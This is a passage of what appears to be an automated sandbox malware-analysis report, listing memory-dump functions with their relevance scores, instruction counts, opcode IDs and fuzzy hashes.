                  • Instruction ID: 006f92b1aa3d2432969ed8982c9a46a99d3795b537fc4666cd76bbca3dd8aecf
                  • Opcode Fuzzy Hash: 5d047558d4cccdbcbab7eabeeebf9a104771a7d6f8bb87c1720b9fbd16d6ed64
                  • Instruction Fuzzy Hash: 15712731A0E58D4FEF78DB5888B65B937C0EF44310B1602BDD09EC75B2DE58AA168781
                  Function 00007FFD9BA2FBDB Relevance: .2, Instructions: 234COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 831f54c79ad724dfa06e5440135109a9b2be6ee3cf0d6e175ae493452f0704e9
                  • Instruction ID: 8f5ba98b9e5332a8d844bf21cb0fa5c2e65cb42d98d249f56be367e9880eee68
                  • Opcode Fuzzy Hash: 831f54c79ad724dfa06e5440135109a9b2be6ee3cf0d6e175ae493452f0704e9
                  • Instruction Fuzzy Hash: 6471C230E5E64E8EEBA8DBA488646FC7BB0FF54304F5105BAD40ED72E5DE696941C700
                  Function 00007FFD9BA106C0 Relevance: .2, Instructions: 226COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: df2e6942f01d9086e61656e722c1ed930cedd636727208f51d70d33b0132d58e
                  • Instruction ID: d72d3660e3d24b4d7d8167cbf63c9e8af5ab906b79f9a79a8d13044e19e9a6c5
                  • Opcode Fuzzy Hash: df2e6942f01d9086e61656e722c1ed930cedd636727208f51d70d33b0132d58e
                  • Instruction Fuzzy Hash: 6A616953B0FACA0FF77157AC68644B53B90EF9275070A92F7D0A8870FBEC55A9058385
                  Function 00007FFD9BA295C8 Relevance: .2, Instructions: 217COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 967796cb0b2ad6b1bf780a218560b5b69c072b49aebe1be75218fe2fe8da66fe
                  • Instruction ID: 9b401348ab364a2817d108d6a66128a401fdaaba0853c7b8b801aae0a3049c3a
                  • Opcode Fuzzy Hash: 967796cb0b2ad6b1bf780a218560b5b69c072b49aebe1be75218fe2fe8da66fe
                  • Instruction Fuzzy Hash: AF81E170A0951D8FDBA9EF58D8A5BA8B3B5FF58700F5000E9E00DD7295CA75AE81CF40
                  Function 00007FFD9BA23CFA Relevance: .2, Instructions: 205COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8e55fd0a854aab9c3edcde3d011c3835442aa8b37992276191cce69e5a0c2efb
                  • Instruction ID: 0e5e31e86ad65b88f773dc56f4526ebf07b961d79acf239156ad684b00d6797e
                  • Opcode Fuzzy Hash: 8e55fd0a854aab9c3edcde3d011c3835442aa8b37992276191cce69e5a0c2efb
                  • Instruction Fuzzy Hash: 90518A2770A96A0EE711B7ECFC665FA7BD0EF923B3B050473D548C6052D921A40D87D2
                  Function 00007FFD9BA11D6D Relevance: .2, Instructions: 194COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6035936ecc7e992d2d051ffe8b5e94e650c91622a086a3b7b840311bf2a00f2
                  • Instruction ID: 0a71858ef38de3e2692a654450a0847104fd9cedf2801105673ffe8dd1d92a8b
                  • Opcode Fuzzy Hash: a6035936ecc7e992d2d051ffe8b5e94e650c91622a086a3b7b840311bf2a00f2
                  • Instruction Fuzzy Hash: C651DF31B19B8D4FDB98DF5888645BA77E2FFE8304B15457ED45AC3292CE34E8028781
                  Function 00007FFD9BA13291 Relevance: .2, Instructions: 177COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a4eb016a6ec5aa38e198608e7d552e467ca416eb5b53e8d3f1e72154e03632e7
                  • Instruction ID: af571bed527c4c734f074cd4f650adc3ec57db84b485210b9b72cffd76b45462
                  • Opcode Fuzzy Hash: a4eb016a6ec5aa38e198608e7d552e467ca416eb5b53e8d3f1e72154e03632e7
                  • Instruction Fuzzy Hash: E4515D71E0961D9FEBA4EFA8C4646EDB7F1FF54301F11513AD009E72A1DA786A44CB10
                  Function 00007FFD9BA1AF68 Relevance: .2, Instructions: 166COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c1d0afae4328d2d4e9b356380441df03f265ae076ab2f877d06b7fb7fa71907a
                  • Instruction ID: a08947712ca784c53a9e0d4da3b29dc0f65b8d2fcdba930cf62c5e2b768229ce
                  • Opcode Fuzzy Hash: c1d0afae4328d2d4e9b356380441df03f265ae076ab2f877d06b7fb7fa71907a
                  • Instruction Fuzzy Hash: 0A510870E0951D8EEBA4EBA8C4A57EDB7F1EF59300F11513AD01DE72A1DE78A9418B40
                  Function 00007FFD9BA28DFA Relevance: .2, Instructions: 156COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 390acb05621688725665360b9892835147c6fd551365b14a23e2d68d0c4101ba
                  • Instruction ID: 836bdedb43c1f9edd36b719afdc6980c3280c7fd87a89c009a474492d15de71a
                  • Opcode Fuzzy Hash: 390acb05621688725665360b9892835147c6fd551365b14a23e2d68d0c4101ba
                  • Instruction Fuzzy Hash: 9151A031A0E65E8FEBA5EB68C8606E97BF0EF15314F0500F6D04CD71A2DA74AA858B41
                  Function 00007FFD9BA1B05A Relevance: .2, Instructions: 151COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2b4615011f6c4c30f2bee0ff26ccab6efacacf8de46921e3cbc4ab7a24c358a2
                  • Instruction ID: 950ae63928a79bcbba8214f122e0ce82c4c106e207f0ab27ce7ac1bf431b9cf2
                  • Opcode Fuzzy Hash: 2b4615011f6c4c30f2bee0ff26ccab6efacacf8de46921e3cbc4ab7a24c358a2
                  • Instruction Fuzzy Hash: A1413662B0E54E5FE7A1EBA8C8A96E97BE0FF15310F4644B7D068C70A6EE64A504C341
                  Function 00007FFD9BA30FF0 Relevance: .1, Instructions: 143COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 759b4ebd27d3e47ad05256e198239e84fbf887194f23ac04887c5e8e44cd877d
                  • Instruction ID: 126563e167715021376aa4536f254a2d0890f6f0b8614848b708aee87e35f527
                  • Opcode Fuzzy Hash: 759b4ebd27d3e47ad05256e198239e84fbf887194f23ac04887c5e8e44cd877d
                  • Instruction Fuzzy Hash: 51413831F4E34A5FE3785B58A46207977E0EF66320F12113FE4CFC32A6D95579024682
                  Function 00007FFD9BA26365 Relevance: .1, Instructions: 142COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2bf4de78e6f38c15b687fe25fdccb7c0a4241dfe8110cfda44892f7d84de91f6
                  • Instruction ID: 2612d57c5484b57066657c0160bcffdc61dc06904c005dde759daf1b114e32f1
                  • Opcode Fuzzy Hash: 2bf4de78e6f38c15b687fe25fdccb7c0a4241dfe8110cfda44892f7d84de91f6
                  • Instruction Fuzzy Hash: FF515E30E4A61D8FEBA4EBA8C4697A977B1FF54300F0141BAD01DD32A1DF786A84CB01
                  Function 00007FFD9BA12185 Relevance: .1, Instructions: 139COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2cf6113da149b346adeadebe43d3f69565987f5da112b11488df6db6827b80c3
                  • Instruction ID: 82c4691fdf6ccd8398f4768cdf5fb29d8b40b2149d6f7f58e6571fb6985e1973
                  • Opcode Fuzzy Hash: 2cf6113da149b346adeadebe43d3f69565987f5da112b11488df6db6827b80c3
                  • Instruction Fuzzy Hash: 74415931B0E68E4FE7A5DBB888655B87BE1EF86304B0541FBD44DC71A2DE68E9418341
                  Function 00007FFD9BA33747 Relevance: .1, Instructions: 127COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4e6d0e1ea4397d60ad93786e220310daf28bfa34220c2141de502d63f956e7c9
                  • Instruction ID: 61ad0a8189df57bd437eb2f2373bda6147d1a9b9803fbf6b0a0a4adc79f159ea
                  • Opcode Fuzzy Hash: 4e6d0e1ea4397d60ad93786e220310daf28bfa34220c2141de502d63f956e7c9
                  • Instruction Fuzzy Hash: BD41613260C9498FDF98EF18C4A5DA9B7E1FBA9310705056ED04EC3692DE21F885CB81
                  Function 00007FFD9BA337F1 Relevance: .1, Instructions: 120COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3759c336fa0f61ca78f029106ef41d1776e899edbc3e63bd62b677faa206c160
                  • Instruction ID: 84b133b27b07faa5936eb258137f94c56a240415c9d890451d278be3bce05da6
                  • Opcode Fuzzy Hash: 3759c336fa0f61ca78f029106ef41d1776e899edbc3e63bd62b677faa206c160
                  • Instruction Fuzzy Hash: 9A31713160CA498FDF98EF18C4A5DA977E1FBA931070506AED44EC72A2DE25FC45CB81
                  Function 00007FFD9BA33EF2 Relevance: .1, Instructions: 119COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 067276b9063abc7d1c8c8fa98ba6586e9800f64cfb4b433bcce4f5c6ab382170
                  • Instruction ID: f76240bf14b9a048e2748480a0b4bd6a8cb480481cc3f90573aebb82829fa98e
                  • Opcode Fuzzy Hash: 067276b9063abc7d1c8c8fa98ba6586e9800f64cfb4b433bcce4f5c6ab382170
                  • Instruction Fuzzy Hash: D5413763F0F58B4BE77647A84CB59B42BA09F21310B0B01B6D05ACA1F3FD9C2E464381
                  Function 00007FFD9BA3378B Relevance: .1, Instructions: 115COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5d05626ba449abe9fb13490fe482cc159c7db775138dff25843815a8d4f8ca30
                  • Instruction ID: 815ba40f85ce493f5f52ce289b9e437426e3e73c35de6487da5d52e2803195c2
                  • Opcode Fuzzy Hash: 5d05626ba449abe9fb13490fe482cc159c7db775138dff25843815a8d4f8ca30
                  • Instruction Fuzzy Hash: F231723160C9498FDF98EF18C4A5DA977E1FBA931070505AED04EC76A2DE35F885CB81
                  Function 00007FFD9BA288FA Relevance: .1, Instructions: 111COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 54cae97cfc8308d4d612ce09e6e313224a4ddfede89ecb0c3b50a0a94c6be6dd
                  • Instruction ID: ba844cf0b6a6cebb40f4e48390523d36ca22ffbea66ff74a9614fde4d75a0221
                  • Opcode Fuzzy Hash: 54cae97cfc8308d4d612ce09e6e313224a4ddfede89ecb0c3b50a0a94c6be6dd
                  • Instruction Fuzzy Hash: D7318375E4D91E8EEBB4DB4888527EC73E0FF15320F0041BAE05DD3191DE746A458B41
                  Function 00007FFD9BA1C342 Relevance: .1, Instructions: 110COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 549cc1767c2e6d9039cac10d8949b85cc7f0a725e0c68124a34179894a6e7057
                  • Instruction ID: 91111be3a475bc710387c2d54a25c3c54e53a06bd7f65e5e8a36175121877f10
                  • Opcode Fuzzy Hash: 549cc1767c2e6d9039cac10d8949b85cc7f0a725e0c68124a34179894a6e7057
                  • Instruction Fuzzy Hash: D731E575E0D91D8EEBE4EBA894A57FCB7B1FF58300F512079D00DE7292DE6869428B40
                  Function 00007FFD9BA30CD9 Relevance: .1, Instructions: 107COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fece632c86c7e9cd31536ca076516632f298afd36d26194f753a24ea6fe7d7af
                  • Instruction ID: 0571fba86a20c4e1ec1459fc3e683a3183193843335799c9e5f6e0fc0c150985
                  • Opcode Fuzzy Hash: fece632c86c7e9cd31536ca076516632f298afd36d26194f753a24ea6fe7d7af
                  • Instruction Fuzzy Hash: 5B318830B1E90D8FD7B89798A4647BD77E1FF48B90F660076E00EC71A1DEA879019749
                  Function 00007FFD9BA25BA8 Relevance: .1, Instructions: 99COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f6ff0300723ebd021fcd71e628f4d2b79483ced64de680bf80d74700bc51a131
                  • Instruction ID: 31c858a4d2a57da33e1ecf4c87674bb5405a6971364d5f54a9b069da479f518d
                  • Opcode Fuzzy Hash: f6ff0300723ebd021fcd71e628f4d2b79483ced64de680bf80d74700bc51a131
                  • Instruction Fuzzy Hash: 1931D970A5951E8FDBA4EF58C855BF977F0EF59315F0101AAA40DE3261DB74AA808B80
                  Function 00007FFD9BA33F00 Relevance: .1, Instructions: 99COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 07363038a7fc5cf48688c62ac0cdda5168d1720661a83c3337321af11ec96586
                  • Instruction ID: 0aa7b9bd41b059dbe98f29b92d6032a8e02d03c597f8d6ff9a98f4b7c49fb729
                  • Opcode Fuzzy Hash: 07363038a7fc5cf48688c62ac0cdda5168d1720661a83c3337321af11ec96586
                  • Instruction Fuzzy Hash: 0B312A63F0F58B4BE77547A848B59B42BA09F21314F0A00FAD4498B1F3FD9C2E4A5291
                  Function 00007FFD9BA33555 Relevance: .1, Instructions: 98COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1e303b0911b2687ad370f5b9b3993ba38bd47e0a7de0189f6d550da6d66b929a
                  • Instruction ID: c83718e19f5f09b1274818d7febf345b75997bd64cc647b6c476e5f87a991c30
                  • Opcode Fuzzy Hash: 1e303b0911b2687ad370f5b9b3993ba38bd47e0a7de0189f6d550da6d66b929a
                  • Instruction Fuzzy Hash: 7E310730E0E94F8FEBA8DB9484A55BD77E1FF54300F5201BAE40ED62A1DBB96A409741
                  Function 00007FFD9BA350D3 Relevance: .1, Instructions: 95COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3726affe4aaa07245b57cd4ee60cb7e94dec6a302085e156cb5ce9218ba7b721
                  • Instruction ID: b080508ae5ab945e4ed790a1d00d762733560d46f9e45e5d8d991348c08db4e6
                  • Opcode Fuzzy Hash: 3726affe4aaa07245b57cd4ee60cb7e94dec6a302085e156cb5ce9218ba7b721
                  • Instruction Fuzzy Hash: 0721293570DA4D4EE715BB38E8745F87BA0EF81324F0505BFD45ACA0D2DD256949C750
                  Function 00007FFD9BA26FB5 Relevance: .1, Instructions: 94COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 156803db645260e6fb539225095942c3a57fb63307b2a2ad97045f95ab1949b9
                  • Instruction ID: 7f682fd4f8bff1d3facf35a99a6253793c7b09a555f87649e9c663d160bbb173
                  • Opcode Fuzzy Hash: 156803db645260e6fb539225095942c3a57fb63307b2a2ad97045f95ab1949b9
                  • Instruction Fuzzy Hash: 6831BE30A0A60E9FDFA8EF68C4656BE37A1FF58300F0145BAD419C31A5CE75AA44C740
                  Function 00007FFD9BA21D2D Relevance: .1, Instructions: 94COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 69a2a0559ebea4f5c6783a247b4cefbe6092017e83420e286b1ec5346bdee9fd
                  • Instruction ID: 7282b1d664ffb253b8666409ae2a4afb7d47216abea74e0b36df973b56a01d6b
                  • Opcode Fuzzy Hash: 69a2a0559ebea4f5c6783a247b4cefbe6092017e83420e286b1ec5346bdee9fd
                  • Instruction Fuzzy Hash: 0431D17094D6CA8FDB469F78C8655E93FF0EF26304F1A00EBD489C70A2CA789546C701
                  Function 00007FFD9BA32441 Relevance: .1, Instructions: 90COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 141778a04ee7ecb784798e3645c3a9a32f5adb89748ba98f9ec8f9abc6dbef08
                  • Instruction ID: 9d8c4c84661c00b2ca59e4c2e96abe770ac470d50387eabcd29609a0c42e935b
                  • Opcode Fuzzy Hash: 141778a04ee7ecb784798e3645c3a9a32f5adb89748ba98f9ec8f9abc6dbef08
                  • Instruction Fuzzy Hash: F3318210A1D39A4BE776839858745747F51FF92341B1A46BAD08BCB0EBD89CBA81C740
                  Function 00007FFD9BA10805 Relevance: .1, Instructions: 85COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1940472a520a46f5e70590e218e29b4af6d604c90233fa3bc4e6155f38ab5e7f
                  • Instruction ID: d0b9f3ba695510e065d626d8abd815a0f1c535578c84956f332d7e4d77dc4a87
                  • Opcode Fuzzy Hash: 1940472a520a46f5e70590e218e29b4af6d604c90233fa3bc4e6155f38ab5e7f
                  • Instruction Fuzzy Hash: A4218B52B0F18B97E76137BC98B95E93B90FF11318B0A41B3E4A9CA0D3DD18A159C2C5
                  Function 00007FFD9BA1C538 Relevance: .1, Instructions: 85COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 919c2e7a9f1ee2c5016fa2c6b7ad4b8053e23cf8272ed6e8be84d25fa9dbff76
                  • Instruction ID: be762219e83e26789dea253c4bac135ee9914063c2e86ea0f02bb45b3d11db56
                  • Opcode Fuzzy Hash: 919c2e7a9f1ee2c5016fa2c6b7ad4b8053e23cf8272ed6e8be84d25fa9dbff76
                  • Instruction Fuzzy Hash: 2B21C47188E3D90FD7535B705C765E63FB4AF03220F0A01E7E498CA4A3E96C1656C362
                  Function 00007FFD9BA28642 Relevance: .1, Instructions: 85COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 04fd0de0e2a7af7729d9b4780fc64e325ea3af48f8921eb6c9a19f6f767f3aca
                  • Instruction ID: d3d7ccea4dc5dbcdfd34371e1013030bb1f034734c02e11d70ba212a239f64e1
                  • Opcode Fuzzy Hash: 04fd0de0e2a7af7729d9b4780fc64e325ea3af48f8921eb6c9a19f6f767f3aca
                  • Instruction Fuzzy Hash: 1521F432E0994D4FDB69DF5898612FCB7B1FF65310F4401BAE09E93291CEB46A818740
                  Function 00007FFD9BA3519D Relevance: .1, Instructions: 84COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ee70f53455d223e7985f6f0ef419e798e7d1c27dcd3244764fd626b7ea6248ce
                  • Instruction ID: 4ea4b81a020b8f02f831322ab628eee3902c61defa4d5407aaca32314d766f53
                  • Opcode Fuzzy Hash: ee70f53455d223e7985f6f0ef419e798e7d1c27dcd3244764fd626b7ea6248ce
                  • Instruction Fuzzy Hash: 9121B130A0A50E4FEB60FBA8C8795BE77E1FF58300F0605BAD41AC70A5DE74AA40C700
                  Function 00007FFD9BA308D2 Relevance: .1, Instructions: 83COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 955ebf1e215932abd73af4a7bde0a2ddc3b632e73e231aaa0852629e488a5f42
                  • Instruction ID: 62956687d6d32bd26ea8e806cfc4d149192fae1717aa1eb18d34c8c3b4329ae6
                  • Opcode Fuzzy Hash: 955ebf1e215932abd73af4a7bde0a2ddc3b632e73e231aaa0852629e488a5f42
                  • Instruction Fuzzy Hash: 85218831F0A90E9FDB68EB98D4A19ACF7A1FF58310B054279D01ED3692CE24BD11CB80
                  Function 00007FFD9BA135D5 Relevance: .1, Instructions: 82COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4447b8b0f506e97470f35f230f6a9f6df569ac8fd3f580c1167bc110e5c362e8
                  • Instruction ID: 2ac07cb91b4a63886ba0d4923988ca49b253e9450cb7861c601d15e7ad0cde22
                  • Opcode Fuzzy Hash: 4447b8b0f506e97470f35f230f6a9f6df569ac8fd3f580c1167bc110e5c362e8
                  • Instruction Fuzzy Hash: 1E212C30A0A64E9FDB98EF64C4695BE77E1FF18304F1118BED42AC71A1DA75A650CB40
                  Function 00007FFD9BA13551 Relevance: .1, Instructions: 82COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
